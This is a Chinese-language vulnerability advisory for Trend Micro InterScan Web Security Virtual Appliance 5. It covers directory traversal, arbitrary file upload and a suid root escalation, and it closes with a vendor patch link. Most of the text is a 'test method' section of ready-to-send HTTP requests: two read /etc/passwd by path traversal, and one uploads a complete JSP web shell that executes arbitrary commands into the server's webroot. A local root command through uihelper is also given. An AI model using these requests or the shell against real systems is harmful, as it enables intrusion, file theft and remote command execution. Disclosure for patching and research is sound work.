受影响系统:
Trend Micro InterScan Web Security Virtual Appliance 5
描述:
BUGTRAQ ID: 41072
InterScan Web Security Virtual Appliance是一款能安装在VMware平台上的网页过滤产品。
InterScan Web Security Virtual Appliance没有正确地过滤提交给/servlet/com.trend.iwss.gui.servlet.exportreport的exportname"参数和提交给/servlet/com.trend.iwss.gui.servlet.ConfigBackup的pkg_name参数,远程攻击者可以通过目录遍历攻击从系统下载任意文件。
InterScan Web Security Virtual Appliance的com.trend.iwss.gui.servlet.XMLRPCcert servlet没有正确地执行安全检查,允许用户上传带有任意扩展名的文件。如果上传了包含有Web Shell的特制JSP脚本,就会导致执行任意命令;此外用户还可以通过目录遍历技术更改原始目的地路径。
InterScan Web Security Virtual Appliance中的uihelper shell设置了suid位,本地用户通过$/usr/iwss/AdminUi/uihelper whoami就可以以root权限执行命令。
<*来源:Ivan Huertas
链接:http://secunia.com/advisories/40328/
http://marc.info/?l=full-disclosure&m=127730641328283&q=p5
http://marc.info/?l=full-disclosure&m=127730618427877&q=p5
http://marc.info/?l=full-disclosure&m=127730628828036&q=p5
http://www.trendmicro.com/ftp/documentation/readme/iwsva_50_ar64_en_cp1386_readme.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
POST /servlet/com.trend.iwss.gui.servlet.exportreport HTTP/1.1
Host: xxx.xxx.xx.xx:1812
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://xxx.xxx.xx.xx:1812/summary_threat.jsp
Cookie: JSESSIONID=D122F55EA4D2A5FA1E7AE4582085F370
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
op=refresh&summaryinterval=7&exportname=../../../../../../../../../../etc/passwd&exportfilesize=443
POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=download HTTP/1.1
Host: xx.xx.xx.xx:1812
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://xx.xx.xx.xx:1812/config_backup_result.jsp?op=export
Cookie: JSESSIONID=D122F55EA4D2A5FA1E7AE4582085F370
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
op=2&ImEx_success=1&pkg_name=/etc/passwd%0D%0A
POST /servlet/com.trend.iwss.gui.servlet.XMLRPCcert?action=import HTTP/1.1
Host: xx.xx.xx.xx:1812
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://xx.xx.xx.xx:1812
Cookie: JSESSIONID=9072F5BC86BD450CFD8B88613FFD2F80
Content-Type: multipart/form-data; boundary=—————————80377104394420410598722900
Content-Length: 2912
—————————–80377104394420410598722900
Content-Disposition: form-data; name="op"
save
—————————–80377104394420410598722900
Content-Disposition: form-data; name="defaultca"
yes
—————————–80377104394420410598722900
Content-Disposition: form-data; name="importca_certificate"; filename="../../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp"
Content-Type: application/octet-stream
<%@ page import="java.util.*,java.io.*"%>
<%%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
—————————–80377104394420410598722900
Content-Disposition: form-data; name="importca_key"; filename="../../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp"
<%@ page import="java.util.*,java.io.*"%>
<%%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
—————————–80377104394420410598722900
Content-Disposition: form-data; name="importca_passphrase"
test
—————————–80377104394420410598722900
Content-Disposition: form-data; name="importca_2passphrase"
test
—————————–80377104394420410598722900
Content-Disposition: form-data; name="beErrMsg"
imperr
—————————–80377104394420410598722900–
建议:
厂商补丁:
Trend Micro
———–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=249®s=NABU&lang_loc=1
0 条评论。